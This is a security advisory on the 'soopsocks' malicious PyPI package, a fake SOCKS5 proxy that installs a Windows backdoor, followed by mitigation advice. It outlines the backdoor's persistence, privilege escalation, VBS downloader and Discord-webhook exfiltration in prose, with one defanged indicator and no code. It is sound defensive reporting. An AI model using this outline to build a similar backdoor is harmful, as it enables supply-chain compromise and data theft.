The soopsocks threat is a malicious Python package uploaded to the PyPI repository on September 26, 2025, by a newly created account. It claimed to provide SOCKS5 proxy capabilities but covertly delivered a backdoor targeting Windows systems. The package installs an executable named _AUTORUN.EXE, compiled in Go, which implements the SOCKS5 proxy but also runs PowerShell scripts to perform reconnaissance (including checking Internet Explorer security settings and Windows installation date), sets firewall rules to allow TCP/UDP traffic on port 1080, and relaunches itself with elevated privileges. It establishes persistence by installing itself as a Windows service and creating scheduled tasks to survive reboots. The package uses a Visual Basic Script (_AUTORUN.VBS) to download a ZIP file containing a legitimate Python binary from an external domain (install.soop[.]space:6969), then runs a batch script to install and execute the malicious package. The malware exfiltrates collected system information to a hardcoded Discord webhook, enabling attackers to receive data stealthily. The infection chain leverages automated installation processes and privilege escalation techniques, making it a sophisticated supply chain attack. Although the package was removed after 2,653 downloads, the incident underscores vulnerabilities in open-source package repositories and the risks posed by malicious dependencies in software supply chains. The attack also highlights the need for improved security controls around package publishing, token management, and CI/CD workflows to prevent similar incidents.

For European organizations, the soopsocks threat poses significant risks, especially for those relying on Python packages in Windows environments. The backdoor functionality enables attackers to establish stealthy proxy services, facilitating lateral movement, command and control, and data exfiltration. The malware’s ability to elevate privileges and persist through reboots increases the difficulty of detection and remediation. Sensitive corporate data and intellectual property could be exposed via exfiltration to attacker-controlled Discord webhooks. The infection could also be leveraged to pivot into internal networks, potentially compromising critical infrastructure or business operations. Organizations with automated CI/CD pipelines that pull dependencies from PyPI without strict vetting are particularly vulnerable. The incident also raises concerns about supply chain security, as malicious packages can bypass traditional endpoint defenses by masquerading as legitimate tools. This could lead to operational disruptions, regulatory compliance issues (e.g., GDPR violations due to data breaches), and reputational damage.

European organizations should implement strict controls on open-source package usage, including: 1) Enforce package provenance verification and use trusted package sources or internal mirrors with vetting processes. 2) Employ automated tools to scan dependencies for known malicious indicators and behavioral anomalies before deployment. 3) Restrict execution of scripts such as PowerShell and VBScript via Group Policy or endpoint protection solutions, especially those downloaded from untrusted sources. 4) Monitor network traffic for unusual outbound connections, particularly to uncommon ports (e.g., TCP/UDP 1080) and suspicious domains or Discord webhooks. 5) Implement least privilege principles to limit the ability of processes to elevate privileges or install services. 6) Harden CI/CD pipelines by enabling multi-factor authentication, short-lived tokens, and granular access controls to prevent unauthorized package publishing. 7) Educate developers and security teams on supply chain risks and encourage use of tools like Socket Firewall or similar solutions that block malicious packages at install time. 8) Regularly audit scheduled tasks and services for unauthorized persistence mechanisms. 9) Maintain up-to-date endpoint detection and response (EDR) solutions capable of detecting suspicious script execution and privilege escalation attempts.